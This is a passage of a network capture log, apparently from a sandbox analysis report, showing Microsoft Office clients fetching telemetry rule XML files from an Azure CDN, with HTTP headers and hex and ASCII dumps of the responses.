                                              2024-10-25 13:46:09 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              112192.168.2.44985913.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:09 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:09 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:09 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1395
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                              ETag: "0x8DC582BDE12A98D"
                                              x-ms-request-id: 3c823cf0-801e-00a3-6533-267cfb000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134609Z-16849878b78lhh9t0fb3392enw000000099000000000087t
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:09 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              113192.168.2.44986213.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:09 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:10 UTC584INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:09 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1389
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                              ETag: "0x8DC582BE10A6BC1"
                                              x-ms-request-id: 2edde2c3-c01e-002b-176a-266e00000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134609Z-16849878b78q4pnrt955f8nkx8000000096g000000008nfr
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              X-Cache-Info: L1_T2
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:10 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              114192.168.2.44986113.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:09 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:10 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:09 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1358
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                              ETag: "0x8DC582BE022ECC5"
                                              x-ms-request-id: 14889e7f-701e-0053-13f2-253a0a000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134609Z-16849878b786vsxz21496wc2qn00000009a000000000haag
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:10 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              115192.168.2.44986313.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:09 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:10 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:09 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1352
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                              ETag: "0x8DC582BE9DEEE28"
                                              x-ms-request-id: 4faef820-a01e-0053-6a4e-228603000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134609Z-16849878b78bcpfn2qf7sm6hsn000000024000000000heen
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:10 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              116192.168.2.44986413.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:09 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:10 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:10 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1405
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                              ETag: "0x8DC582BE12B5C71"
                                              x-ms-request-id: 2e8006eb-901e-0083-471c-26bb55000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134609Z-16849878b78nx5sne3fztmu6xc00000001kg00000000bf5e
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:10 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              117192.168.2.44986513.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:10 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:10 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:10 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1368
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                              ETag: "0x8DC582BDDC22447"
                                              x-ms-request-id: 04521c86-e01e-0003-3ff4-240fa8000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134610Z-15b8d89586fbt6nf34bm5uw08n00000004eg000000009c29
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:10 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              118192.168.2.44986713.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:10 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:10 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:10 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1364
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                              ETag: "0x8DC582BE1223606"
                                              x-ms-request-id: 275a1f3a-c01e-007a-47a4-26b877000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134610Z-16849878b78rjhv97f3nhawr7s000000096000000000fhpt
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:10 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              119192.168.2.44986613.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:10 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:10 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:10 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1401
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                              ETag: "0x8DC582BE055B528"
                                              x-ms-request-id: 7f6d22c4-101e-0046-21f0-2591b0000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134610Z-16849878b78bcpfn2qf7sm6hsn000000027000000000azw3
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:10 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              120192.168.2.44986813.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:10 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:10 UTC584INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:10 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1397
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                              ETag: "0x8DC582BE7262739"
                                              x-ms-request-id: f0c9e92d-201e-0000-1199-25a537000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134610Z-16849878b7898p5f6vryaqvp5800000001dg00000000dktu
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache-Info: L1_T2
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:10 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              121192.168.2.44986913.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:10 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:10 UTC584INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:10 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1360
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                              ETag: "0x8DC582BDDEB5124"
                                              x-ms-request-id: cb3ec3ab-c01e-0014-40b8-26a6a3000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134610Z-16849878b787wpl5wqkt5731b4000000018g00000000kg6r
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              X-Cache-Info: L1_T2
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:10 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              122192.168.2.44987013.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:11 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:11 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:11 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1403
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
